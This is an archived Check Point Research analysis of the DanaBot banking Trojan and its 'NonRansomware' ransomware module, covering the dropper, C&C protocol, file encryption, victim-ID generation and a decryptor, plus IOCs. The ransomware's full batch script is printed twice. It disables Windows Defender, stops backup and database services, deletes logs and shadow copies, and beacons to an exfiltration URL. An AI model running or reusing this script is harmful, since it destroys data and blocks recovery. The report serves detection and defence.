{
	"id": "e2b1f2e6-dfd5-4dcf-bee8-dc2b976b8f7c",
	"created_at": "2026-04-06T03:37:12.984533Z",
	"updated_at": "2026-04-10T03:23:51.8183Z",
	"deleted_at": null,
	"sha1_hash": "28888a24663c5cecbc93baf5284e4010d499e5b7",
	"title": "DanaBot Demands a Ransom Payment",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 116474,
	"plain_text": "DanaBot Demands a Ransom Payment\r\nBy deugenio\r\nPublished: 2019-06-20 · Archived: 2026-04-06 02:50:40 UTC\r\nResearch by: Yaroslav Harakhavik  and Aliaksandr Chailytko\r\nIt’s been over a year since DanaBot was first discovered, and its developers are still working to improve it and find new\r\nopportunities to collaborate with other malware actors.\r\nCheck Point Research has been tracking DanaBot campaigns since August 2018 and recently discovered that some bots\r\nbelonging to European campaigns had started dropping an executable file which turned out to be a ransomware written\r\nin Delphi.\r\nDanaBot was already involved in sending spam and cooperating with GootKit in the past, as well as dropping Remcos\r\nRAT on infected machines. While DanaBot is still actively supported, its operators now add new plugins and\r\nconfiguration files and update various parts of the malware (including string encryption and file name generation\r\nalgorithms, and even the communication protocol).\r\nIn the following report, we will review the latest updates in DanaBot’s functionality, and take a deep dive into the inner-workings and encryption methods of this new ransomware.\r\nDanaBot Overview\r\nDanaBot is a banking Trojan which is distributed using phishing emails. Links usually lead to either a JavaScript or\r\nPowerShell dropper.\r\nThe malware has the following capabilities:\r\nStealing browsers and FTP clients credentials\r\nCollecting crypto wallets credentials\r\nRunning a proxy on an infected machine\r\nPerforming Zeus-style web-injects\r\nTaking screenshots and recording video\r\nProviding a remote control via RDP or VNC\r\nRequesting updates via TOR\r\nBypassing UAC using a WUSA exploit\r\nRequesting updates from C\u0026C server and execute commands\r\nAll DanaBot versions communicate with the C\u0026C server via a custom TCP-based protocol over 443 port.\r\nSince its first appearance, DanaBot has spread throughout Europe, Australia, New Zealand, USA and Canada. Several\r\ncampaigns were discovered\r\n which target different countries. A campaign is defined by two hardcoded values:\r\nCampaign ID;\r\nCampaign salt – A number used for a packet validation by the C\u0026C server\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 1 of 22\n\nCampaigns which are currently active are shown in Table 1.\r\nCampaign ID Campaign Salt Countries\r\n2 586856666 None\r\n3 897056567 Italy, Poland\r\n4 645456234 Australia\r\n5 423676934 Australia\r\n6 235791346 Australia\r\n7 765342789 Italy, Poland\r\n8 342768343 Canada, USA\r\n9 909445453 None\r\n11 445577321 Unknown\r\n14 653345567 Canada\r\n15 655222455 Poland, USA\r\n17 878777777 Unknown\r\n18 234456788 Unknown\r\n19 335347974 Unknown\r\n20 113334444 Unknown\r\n24 784356646 Unknown\r\nTable 1 – Active DanaBot campaigns\r\nThe Dropper\r\nThe initial infection vector is usually an email with a document or a link which leads to a malicious dropper.\r\nOne of the latest cases is a new Australian campaign (ID=6) which was discovered by Check Point in April 2019.\r\nDanaBot was spread in its usual way – phishing emails with links to a file uploaded to Google Docs.\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 2 of 22\n\nFig 1: Phishing email examples\r\nThe downloaded file turned out to be a VBS script which functions as a DanaBot dropper. The dropper unpacks the\r\nDanaBot downloader DLL into the %TEMP% directory and registers it as a service.\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 3 of 22\n\nFig 2: DanaBot VBS dropper\r\nDanaBot Downloader\r\nThe DanaBot downloader is represented by a 32- or 64-Bit DLL which starts by calling its f0 function. After the January\r\n2019 update, the downloader took on many of the main module’s roles: for example, it bypasses UAC and pretends to\r\nbe a Windows System Event Notification Service. It communicates with C\u0026C servers, downloads DanaBot plugins and\r\nconfiguration files, updates itself, and executes the main module.\r\nIn January, the DanaBot downloader changed its communication protocol, obscuring it with the AES256 encryption.\r\nThe new protocol was described in detail by ESET. The initial communication between an infected machine and a C\u0026C\r\nserver is shown in Figure 3.\r\nThe main points of the new protocol are:\r\n1. Both the bot and C\u0026C server generate a new AES256 key (AesKey in Figure 1) for every packet they send.\r\n2. The bot sends an RSA public key (RsaSessionKey in Figure 1) to the C\u0026C server which is used by the server to\r\nencrypt its generated AesKeys.\r\n3. The bot encrypts the generated AesKeys with a hardcoded public RSA key (HardcodedRsaKey in Figure 1). The\r\nprivate key is owned exclusively by the C\u0026C server.\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 4 of 22\n\nFig 3: Encryption in Bot-to-C\u0026C communication protocol\r\nThe layout of TCP packets for the latest communication protocol is decribed in the Appendix A.\r\nThe DanaBot downloader can be detected by a public RSA key hardcoded into the DLL’s body. It’s usually XOR’ed\r\nwith a byte in the range [0x01; 0xFF].\r\nFig 4: The downloader’s hardcoded RSA public key\r\nThe new campaign sample requests the following modules and configuration files:\r\nModules:\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 5 of 22\n\nMain module\r\nStealer plugin\r\nVNC plugin\r\nRDP plugin\r\nTOR plugin\r\nConfiguration files:\r\nBitVideo – Process list to record\r\nBitFiles – List of cryptocurrency files\r\nKeyProcess – Process list for keylogging\r\nPFilter – List of web-sites for sniffing\r\nInject (or inject, inj, inj* or in*) – Web-inject configuration\r\nRedirect (redik*) – Configuration for redirection\r\nNonRansomware Distribution\r\nAt the end of April, DanaBot C\u0026C server 95.179[.]186[.]57 started including in the list of available modules a new\r\nmodule, D932613F6447F0C56744B1AD53230C62 for a European campaign with ID=7. The module, which was an\r\nexecutable file written in Delphi, was named “crypt.”\r\nThe new module turned to be a variant of the “NonRansomware” ransomware which enumerates files on local drives\r\nand encrypts all of them except the Windows directory. The encrypted files have a .non extension. A ransom message\r\nHowToBackFiles.txt is placed in each directory which contains encrypted files.\r\nIn the beginning of May, this ransomware was found in the Wild.\r\nFig 5: Ransom message\r\nAfter its execution, the malware puts a batch file b.bat in %TEMP% and runs it. The batch script contains the following\r\ncontent:\r\n@echo off\r\nset “__COMPAT_LAYER=RunAsInvoker”\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 6 of 22\n\nreg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management”\r\n/v ClearPageFileAtShutDown  /t REG_DWORD /d 1 /f\r\nreg add “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced” /v Hidden /t\r\nREG_DWORD /d 1 /f\r\nreg add “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced” /v\r\nSuperHidden /t REG_DWORD /d 1 /f\r\nreg add “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced” /v\r\nShowSuperHidden /t REG_DWORD /d 1 /f\r\nreg add “HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender” /v DisableAntiSpyware /t\r\nREG_DWORD /d 1 /f\r\nreg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest” /v\r\nUseLogonCredential /t REG_DWORD /d 1 /f\r\nnet stop mssqlserver\r\nnet stop sqlwriter\r\nnet stop VeeamEndpointBackupSvc\r\nnet stop mssqlfdlauncher\r\nnet stop cpqvcagent\r\nnet stop TeamViewer\r\nnet stop klsbackup2013pro\r\nnet stop foxitreaderservice\r\nnet stop mysql\r\nnet stop mssqlserver\r\nnet stop mysql501\r\nnet stop veeamdeploysvc\r\nnet stop veeamtransportsvc\r\nnet stop wuauserv\r\nnet stop sysmgmthp\r\nnet stop sysdown\r\nnet stop adobearmservice\r\nnet stop themes\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 7 of 22\n\nnet stop sqlbrowser\r\nnet stop sql backupmaster\r\nnet stop sqlagent$sql2008exp\r\nnet stop sqltelemetry$sqlexpress\r\nnet stop mssql$sqlexpress\r\nnet stop mikroclientwservice\r\nnet stop reportserver\r\nnet stop sqlserveragent\r\nnet stop MSSQL$MIKRO\r\nnet stop msdtc\r\nnet stop sqltelemetryvv\r\ntaskkill /F /IM Veam.EndPoint.Tray.exe\r\ntaskkill /F /IM jusched.exe\r\ntaskkill /F /IM jucheck.exe\r\ntaskkill /F /IM IAStorDataMgrSvc.exe\r\ntaskkill /F /IM IAStorIcon.exe\r\ntaskkill /F /IM isa.exe\r\ntaskkill /F /IM armsvc.exe\r\ntaskkill /F /IM TeamViewer.exe\r\ntaskkill /F /IM TeamViewer_Service.exe\r\ntaskkill /F /IM tv_w32.exe\r\ntaskkill /F /IM tv_x64.exe\r\npowercfg.exe -h off\r\nRD /S /Q “C:\\Windows\\Temp\\”\r\nRD /S /Q “C:\\Windows\\Logs\\”\r\nRD /S /Q “C:\\Windows\\Installer\\”\r\npowershell.exe -ExecutionPolicy Bypass\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 8 of 22\n\nDisable-ComputerRestore “C:\\”\r\nDisable-ComputerRestore “D:\\”\r\nDisable-ComputerRestore “E:\\”\r\nDisable-ComputerRestore “F:\\”\r\nDisable-ComputerRestore “H:\\”\r\nClear-EventLog “Windows PowerShell”\r\nClear-RecycleBin -Confirm:$false\r\nvssadmin delete shadows /all\r\nThe scripts is responsible for:\r\nEnabling setting for showing hidden files\r\nDisabling Windows Defender\r\nEnabling ClearPageFileAtShutDown to purge the pagefile.sys\r\nStopping services\r\nStopping monitoring software (Veeam, TeamViewer, etc.)\r\nDisabling hibernation\r\nRemoving logs\r\nBypassing the PowerShell Execution Policy\r\nDisabling restoration for the following logical disks: C, D, E, F, H;\r\nClearing EventLog and Recycle Bin\r\nDeleting shadow copies for all volumes\r\nThen the malware schedules a task which will execute the malware every 14 minutes. The full command line for\r\nschtasks.exe is shown in Figure 6.\r\nFig 6: Ransomware task creation\r\nThe obscured name of the task is just a damaged string “SysUtils.” The malware uses a simple algorithm and a\r\nhardcoded key “Hello World!” to decrypt the strings. The developers – deliberately or not – applied this algorithm to a\r\nplain string to create a task name.\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 9 of 22\n\nFig 7: Decrypting schtasks.exe parameters and damaging the task name by the same decryption algorithm\r\nThe string decryption algorithm is shown in Figure 8.\r\nFig 8: Decrypting strings that are used in the ransomware source code\r\nThe ransomware enumerates logical drives, visits all the directories except Windows, and encrypts all the files using\r\nAES128. The password is a string representation of the system volume serial number. Every file is encrypted in a\r\nseparate thread.\r\nThe victim ID which is shown in the ransom message is generated from the password (i.e. C disk serial number)\r\naccording to the following algorithm:\r\nFig 9: Victim ID generation algorithm\r\nBasically, this can be rewritten as the following equation:\r\nwhere  – encryption key,  – plain text,  – cipher text and  – text index.\r\nAs it is impossible to create an inverse function for this equation, it is likely that the malware operators have to\r\nbruteforce the password (p) on the basis of the known victim ID (c) and hardcoded key (k). The following code can be\r\nused to restore the password from the victim ID:\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 10 of 22\n\nFig 10: Restoring the password by the victim ID\r\nThe encryption itself is not obvious unless… it was copy-pasted from the unit tests of the\r\nDelphiEncryptionCompendium (DEC) library. The encryption function is a slightly modified DemoCipherFile\r\nprocedure of the library’s test project. The main difference is using Panama hash instead of SHA1.\r\nA comparison of the disassembly code of the ransomware and the corresponding source code of DEC test project is\r\nshown in Figures 11-12.\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 11 of 22\n\nFig 11: Ransomware: Objects initialization\r\nFig 12: DEC: Objects initialization\r\nThere is a very detailed description of the encryption process in the source code.\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 12 of 22\n\nFig 13: Comments for EncodeFile\r\nSo the only thing that is needed to restore the encrypted files is to call the DecodeFile function for all the encrypted files\r\nwith a password bruteforced using the known victim ID.\r\nA GUI tool for file decryption is attached at the end of this article.\r\nThe layout of an encrypted file and its structure are shown in Figure 14 and Table 2.\r\nFig 14: Encrypted file layout\r\nField Size\r\nCipher Identity 4 Bytes\r\nCipherMode 1 Byte\r\nHash Identity 3 Bytes\r\nSeed Size 1 Byte\r\nSeed Seed Size\r\nCipher Text Size 4 Bytes\r\nCipher Text Cipher Text Size\r\nChecksum Size 4 Bytes\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 13 of 22\n\nChecksum Checksum Size\r\nTable 2: The structure of an encrypted file\r\nFinally, the malware checks a network connection and sends information about the infected PC to\r\nencrypter[.]webfoxsecurity[.]com. It first detects the version of Windows, generates a unique ID, retrieves the user name\r\nand builds the following string:\r\n{“#ersio.”:”1.4.3″, “win”:”\u003cWINDOWS_VERSION\u003e”, “hwid”:”\u003cUNIQUE_ID\u003e”, “UserName”:”User”, “Admin”:”0″}\r\nExample:\r\n{“#ersio.”:”1.4.3″, “win”:”Windows 7 Professional 32-bit”, “hwid”:”00029646″, “UserName”:”User”, “Admin”:”0″}\r\nUNIQUE_ID is generated based either on UUID (by using UuidCreateSequential) or on a volume serial number if\r\nUuidCreateSequential failed.\r\nThe resulting string is encoded to Base64 and is sent to the previously mentioned address by using a GET request in the\r\nfollowing format:\r\nhttp:[/]/encrypter[.]webfoxsecurity[.]com/api/key?k=\u003cBASE64\u003e\r\nConclusion\r\nFor almost a year, DanaBot has been extending its capabilities and evolving into a more sophisticated threat. We assume\r\nits operators will continue to add more improvements. Check Point provides a protection from these threats. We’ll keep\r\nan eye on it and update you further.\r\nA lot of ransomware still remain a relatively stable source of income for cyber criminals. Therefore such simple “copy-paste” encryptors as the one that was described here will continue to emerge constantly. Note – In general, we do not\r\nrecommend paying ransom to decrypt your files, and especially not in a case like this.\r\nAppendix A. DanaBot Downloader’s payload packet layout\r\nThe unencrypted packet layout and the meaning of its fields are shown in Figure 15 and Table 3.\r\nFig 15: Unencrypted initial payload packet layout\r\nTable 3: Packet layout\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 14 of 22\n\nOffset Size Purpose\r\n0x00 0x04 Packet header size (0xA7)\r\n0x04 0x08 Random number (rand_1)\r\n0x0C 0x08 Sum of header size and rand_1\r\n0x14 0x04 Campaign ID\r\n0x18 0x04 Message ID\r\n0x1C 0x04 Message parameter\r\n0x20 0x04 Random number (rand_2)\r\n0x24 0x04 Constant (0x00)\r\n0x28 0x04 Architecture (32, 64)\r\n0x2C 0x04 Windows version token\r\n0x30 0x04 0 or 0x03E9 (depends on Message ID)\r\n0x34 0x04 Constant (0x01)\r\n0x38 0x04 Admin status\r\n0x3C 0x08 Constant (0x01)\r\n0x44 0x01 Border\r\n0x45 0x20 Bot ID\r\n0x65 0x01 Border\r\n0x66 0x20 Module or Checksum #1 (depends on Message ID)\r\n0x86 0x01 Border\r\n0x87 0x20 Checksum #2\r\nChecksum #1 is required only in certain requests, such as an initial request when a bot communicates with the C\u0026C\r\nserver to announce its presence. Checksum #2 is placed at the end of every payload that the bot sends to the C\u0026C\r\nserver. Checksums are calculated by the following formulas:\r\nThe encrypted packet is preceded by a 24-byte header. The first 8 bytes contain the size of payload packet, the next 8\r\nbytes contain a random 2-byte number, and the last 8 bytes are equal to the sum of the payload size and the random\r\nnumber.\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 15 of 22\n\nFig 16: Example of a payload packet header\r\nAppendix B. DanaBot IOCs\r\nAlive C\u0026C servers Status\r\n192.71.249.51 Alive\r\n178.209.51.211 Alive\r\n185.92.222.238 Down\r\n89.144.25.104 Down\r\n89.144.25.243 Alive\r\n84.54.37.102 Down\r\n149.28.180.182 Alive\r\n95.179.186.57 Alive\r\nDroppers location on GoogleCloud\r\nhxxps://docs.google[.]com/uc?id=1q4EYE4umvEFfdlL4_IshSQ4UqnhWAg9t\r\nhxxps://docs.google[.]com/uc?id=1gu8efqkSDDXZIDMX2cnFc73NyyuVYIF0\r\nWebInject \u0026 Redirect IP and domains\r\n194.76.225.28\r\n185.189.149.235\r\ndemo.maintrump.org\r\nkaosutdoaaf.pw\r\nkaosutdoaaf6.pw\r\nkaosjdoaaf6.pw\r\nkadosjdoaaf6.pw\r\nkadosjdoaf6.pw\r\nkadosjdoafa.pw\r\nkadosjdoiafa.pw\r\nkdosjdoiafa.pw\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 16 of 22\n\nkduwouewpew.pw\r\nkdguwoewpew.pw\r\nsfjskdjfwoiewwegroup.tech\r\nbrekwinarew.site\r\njklfsdkfjhwefjosdf.top\r\njklfsdkfjhwefjosdf.xyz\r\ngoskilindad.site\r\nmon-sta.com\r\nlindakiski.top\r\nlidaskiheg.space\r\nlnet4-data.com\r\nnet4-data.com\r\nlidaskiheg.site\r\nbruksialopws.icu\r\nbrukaisloap.club\r\nbraksiolsa.top\r\nbrukiloapos.xyz\r\noneuisopeweh.icu\r\nokjauwbueiws.xyz\r\nokjauwbueiws.top\r\nonueilsndsuywe.xyz\r\ngustemiaksa.icu\r\nthegiksjoute.online\r\nguksuoiew.top\r\ngustokiloe.xyz\r\ngousikolka.space\r\nthenautorern.tech\r\nnautorern.xyz\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 17 of 22\n\nkipokahynr.top\r\nkipokahynr.xyz\r\nmuabolksae.club\r\nmuoklaiow.xyz\r\nExamples of DanaBot modules\r\nModule MD5\r\nVBS Dropper a1f119be2c55029f4d38f9356a1cc680\r\nDownloader (x86) b0c1bdc0b21aa99e2d777eef39c18a11\r\nDownloader (x64) 11e7e83043259310a5ae8689b4e34992\r\nMain module (x86) ca8c3113b9afa9d8bb8fe1f6653a9547\r\nMain module (x64) eacd1da520a33d842b09cef81606c745\r\nPlugin MD5\r\nStealer (x86) ee89e89b0ee8f5b3241e69b4a6632b00\r\nStealer (x64) 7efc6b42338b28470716c126a3c1cc46\r\nVNC d917226cba970dcf3f2b7c59cf212221\r\nTOR bcf4a4a96b6dacd026d507d0e49797C6\r\nRDPWrap 0f54d5a13821c0e31eb5730a4aba75f2\r\nAppendix C. NonRansomware IOCs\r\nmd5 sha256\r\na3629977d2c9f7eb30a13bdce14e3f45 5dad162cbc990d3f45d2fe3b9d96ebd0c4af92997f621a207387201ed6b34893\r\ne48067d2ad6adcbf2e4cf7e705d4bd82 8a21e1224a8f1d7dd9d4e42c78c829fb82808631577477e8f699f15feb7c8988\r\nSpawned processes\r\nC:\\Users\\\u003cUSER_NAME\u003e \\AppData\\Local\\Temp\\b.bat\r\nC:\\Windows\\System32\\schtasks.exe /c /Create /SC MINUTE /MO 14 /TN\r\n\\xc3\\xab\\xc3\\xb4\\xc3\\xa7\\xc3\\x89\\xc3\\xa5I\\xc3\\xb5\\xc3\\xa4 /TR “\u003cFILE_PATH\u003e” /F\r\nDropped Files\r\nC:\\Windows\\System32\\cmd.exe /c %TEMP%\\b.bat\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 18 of 22\n\n\u003cPATH_WITH_ENCRYPTED_FILES\u003e\\HowToBackFiles.txt\r\nNetwork\r\nhttp://encrypter.webfoxsecurity.com/api/key?k=\r\nMutexes\r\nRunningNow\r\nStrings\r\nxihuanya@protonmail.com\r\nHowToBackFiles.txt\r\n@echo off\r\nset “__COMPAT_LAYER=RunAsInvoker”\r\nreg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory\r\nManagement” /v ClearPageFileAtShutDown  /t REG_DWORD /d 1 /f\r\nreg add “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced” /v Hidden\r\n/t REG_DWORD /d 1 /f\r\nreg add “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced” /v\r\nSuperHidden /t REG_DWORD /d 1 /f\r\nreg add “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced” /v\r\nShowSuperHidden /t REG_DWORD /d 1 /f\r\nreg add “HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender” /v\r\nDisableAntiSpyware /t REG_DWORD /d 1 /f\r\nreg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest” /v\r\nUseLogonCredential /t REG_DWORD /d 1 /f\r\nnet stop mssqlserver\r\nnet stop sqlwriter\r\nnet stop VeeamEndpointBackupSvc\r\nnet stop mssqlfdlauncher\r\nnet stop cpqvcagent\r\nnet stop TeamViewer\r\nnet stop klsbackup2013pro\r\nnet stop foxitreaderservice\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 19 of 22\n\nnet stop mysql\r\nnet stop mssqlserver\r\nnet stop mysql501\r\nnet stop veeamdeploysvc\r\nnet stop veeamtransportsvc\r\nnet stop wuauserv\r\nnet stop sysmgmthp\r\nnet stop sysdown\r\nnet stop adobearmservice\r\nnet stop themes\r\nnet stop sqlbrowser\r\nnet stop sql backupmaster\r\nnet stop sqlagent$sql2008exp\r\nnet stop sqltelemetry$sqlexpress\r\nnet stop mssql$sqlexpress\r\nnet stop mikroclientwservice\r\nnet stop reportserver\r\nnet stop sqlserveragent\r\nnet stop MSSQL$MIKRO\r\nnet stop msdtc\r\nnet stop sqltelemetryvv\r\ntaskkill /F /IM Veam.EndPoint.Tray.exe\r\ntaskkill /F /IM jusched.exe\r\ntaskkill /F /IM jucheck.exe\r\ntaskkill /F /IM IAStorDataMgrSvc.exe\r\ntaskkill /F /IM IAStorIcon.exe\r\ntaskkill /F /IM isa.exe\r\ntaskkill /F /IM armsvc.exe\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 20 of 22\n\ntaskkill /F /IM TeamViewer.exe\r\ntaskkill /F /IM TeamViewer_Service.exe\r\ntaskkill /F /IM tv_w32.exe\r\ntaskkill /F /IM tv_x64.exe\r\npowercfg.exe -h off\r\nRD /S /Q “C:\\Windows\\Temp\\”\r\nRD /S /Q “C:\\Windows\\Logs\\”\r\nRD /S /Q “C:\\Windows\\Installer\\”\r\npowershell.exe -ExecutionPolicy Bypass\r\nDisable-ComputerRestore “C:\\”\r\nDisable-ComputerRestore “D:\\”\r\nDisable-ComputerRestore “E:\\”\r\nDisable-ComputerRestore “F:\\”\r\nDisable-ComputerRestore “H:\\”\r\nClear-EventLog “Windows PowerShell”\r\nClear-RecycleBin -Confirm:$false\r\nvssadmin delete shadows /all\r\nAppendix D. Check Point Signatures\r\nMalware CP Product Detect Name\r\nDanaBot\r\nAnti-Bot Trojan.Win32.DanaBot.*\r\nThread Emulation Trojan.Win.DanaBot.A\r\nSand Blast Agent Trojan.Win.DanaBot.B\r\nNonRansomware\r\nAnti-Ransomware Ransomware.Win.TouchTrapFiles.A\r\nSand Blast Agent Gen.Win.DisWinDef.A\r\nDecryption tool\r\nClick here to download the NonDecryptor tool.\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 21 of 22\n\nSource: https://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 22 of 22",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/"
	],
	"report_names": [
		"danabot-demands-a-ransom-payment"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775446632,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/28888a24663c5cecbc93baf5284e4010d499e5b7.pdf",
		"text": "https://archive.orkl.eu/28888a24663c5cecbc93baf5284e4010d499e5b7.txt",
		"img": "https://archive.orkl.eu/28888a24663c5cecbc93baf5284e4010d499e5b7.jpg"
	}
}